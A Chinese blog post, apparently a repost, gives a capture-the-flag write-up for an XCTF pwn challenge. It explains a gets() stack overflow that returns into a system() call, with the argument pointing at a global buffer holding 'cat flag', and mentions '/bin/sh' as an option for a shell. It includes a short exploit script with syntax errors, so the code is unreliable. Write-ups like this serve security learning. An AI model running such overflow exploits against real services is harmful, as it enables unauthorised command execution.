首页 > 其他 > 详细

CTF:第七题

时间:2020-05-30 16:15:46      阅读:35      评论:0      收藏:0      [点我收藏+]

https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5059&page=1

 

技术分享图片

 

 技术分享图片

 

 题面如上,

技术分享图片

 

 关键函数如下

 

本题,纵观代码,发现,只有system,没有命令,

这种情况下,就需要我自己拼命令了,

由于是个简单的gets栈溢出,

然后就好办了。

构造一个这样得命令

payload = (a) * 0x26 + 4字节的ebp + 4字节的返回地址 +4字节的参数

4字节的ebp 可以为任意值

4字节的返回地址,返回 call system 的地址,让函数返回的时候顺利调用这里

4字节的参数,是 system 函数的参数,这里需要精心构造

 

参数怎么构造,内存里面没有可用字符串啊,

所以这里就需要手动构造了,但是去哪里构造呢,

前面看代码其实可以看到,有一个地方给了我们一个机会,

就是hello函数里面最后一个 fgets ,获取到的信息,放到了一个全局变量里面,

这个不错,我直接写入一个命令,然后把全局变量地址当成4字节参数传进去不就好了。

至于这个参数是什么,有两种做法

1:cat flag ,适用于flag就在当前目录下,直接就能输出

2:/bin/sh ,适用于不清楚的情况下拿shell,

我喜欢第一种做法。

 

代码如下

1 a = remote(124.126.19.106, 53637)
2 
3 
4 payload = a * (0x26 + 4) + int322str(0x0804855A) + int322str(0x0804A080)
5 a.recvuntil("name\n")
6 a.sendline(cat flag\x00)
7 a.recvuntil(here:\n)
8 a.sendline(payload)
9 a.interactive()

 

然后直接就输出了flag

技术分享图片

 

CTF:第七题

原文:https://www.cnblogs.com/suanguade/p/12992848.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!